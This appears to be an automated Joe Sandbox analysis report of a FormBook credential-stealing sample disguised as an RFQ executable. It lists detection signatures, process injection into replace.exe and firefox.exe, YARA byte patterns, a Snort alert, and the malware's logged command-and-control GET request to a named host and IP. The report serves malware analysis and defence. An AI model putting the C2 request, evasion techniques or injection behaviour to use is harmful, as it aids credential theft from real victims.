Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ 0400-ENPI-RQMA.exe

Overview

General Information

Sample name:RFQ 0400-ENPI-RQMA.exe
Analysis ID:1430324
MD5:73b6e5a11aff9e7bd681b55136c5fbcf
SHA1:d8113fa2bd2b2fa43f3920b93f9a5217b9cb69a2
SHA256:3ca71ea7d01b1f1e3613781fcd68b47c09a159af5876c134065bef4d912917a6
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ 0400-ENPI-RQMA.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe" MD5: 73B6E5A11AFF9E7BD681B55136C5FBCF)
    • RFQ 0400-ENPI-RQMA.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe" MD5: 73B6E5A11AFF9E7BD681B55136C5FBCF)
      • KdcHSkcpIgYD.exe (PID: 6016 cmdline: "C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 7840 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • KdcHSkcpIgYD.exe (PID: 4048 cmdline: "C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8104 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2dd83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dd83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cf83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16552:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:04/23/24-14:23:35.363733
            SID:2855465
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: RFQ 0400-ENPI-RQMA.exeReversingLabs: Detection: 28%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: RFQ 0400-ENPI-RQMA.exeJoe Sandbox ML: detected
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: RFQ 0400-ENPI-RQMA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: aYJw.pdb source: RFQ 0400-ENPI-RQMA.exe
            Source: Binary string: replace.pdb source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895608255.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000003.1866058996.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1926765955.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000002.2895608255.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000004.00000003.1866058996.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KdcHSkcpIgYD.exe, 00000004.00000000.1853172112.00000000009BE000.00000002.00000001.01000000.0000000D.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2897838287.00000000009BE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1928920536.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1926857156.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ 0400-ENPI-RQMA.exe, RFQ 0400-ENPI-RQMA.exe, 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1928920536.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1926857156.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: aYJw.pdbSHA256 source: RFQ 0400-ENPI-RQMA.exe
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 4x nop then jmp 07D87AD1h0_2_07D871E1

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 79.98.25.1:80
            Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
            Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /aleu/?lT2ltVXh=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&66=uX3d2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.maxiwalls.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: unknownDNS traffic detected: queries for: www.maxiwalls.com
            Source: RFQ 0400-ENPI-RQMA.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: RFQ 0400-ENPI-RQMA.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: RFQ 0400-ENPI-RQMA.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: RFQ 0400-ENPI-RQMA.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661760268.0000000005CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comar
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/default.css
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/footer.html
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/header.html
            Source: firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/icon.png
            Source: firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/thumbnail.png
            Source: replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://klientams.iv.lt/
            Source: replace.exe, 00000005.00000002.2175137923.0000000002B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: replace.exe, 00000005.00000002.2175137923.0000000002B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: replace.exe, 00000005.00000002.2175137923.0000000002B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: replace.exe, 00000005.00000002.2175137923.0000000002B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: replace.exe, 00000005.00000002.2175137923.0000000002B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: replace.exe, 00000005.00000003.2106155503.0000000007BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RFQ 0400-ENPI-RQMA.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/domenai/
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/duomenu-centras/
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/el-pasto-filtras/
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/sertifikatai/
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/talpinimo-planai/
            Source: replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/vps-serveriai/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.32e5318.4.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
            Source: 0.2.RFQ 0400-ENPI-RQMA.exe.7ae0000.11.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: RFQ 0400-ENPI-RQMA.exe
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0042B233 NtClose,2_2_0042B233
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014035C0 NtCreateMutant,LdrInitializeThunk,2_2_014035C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402B60 NtClose,LdrInitializeThunk,2_2_01402B60
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01402DF0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01402C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01402C70
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01403010 NtOpenDirectoryObject,2_2_01403010
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01403090 NtSetValueKey,2_2_01403090
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01404340 NtSetContextThread,2_2_01404340
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01404650 NtSuspendThread,2_2_01404650
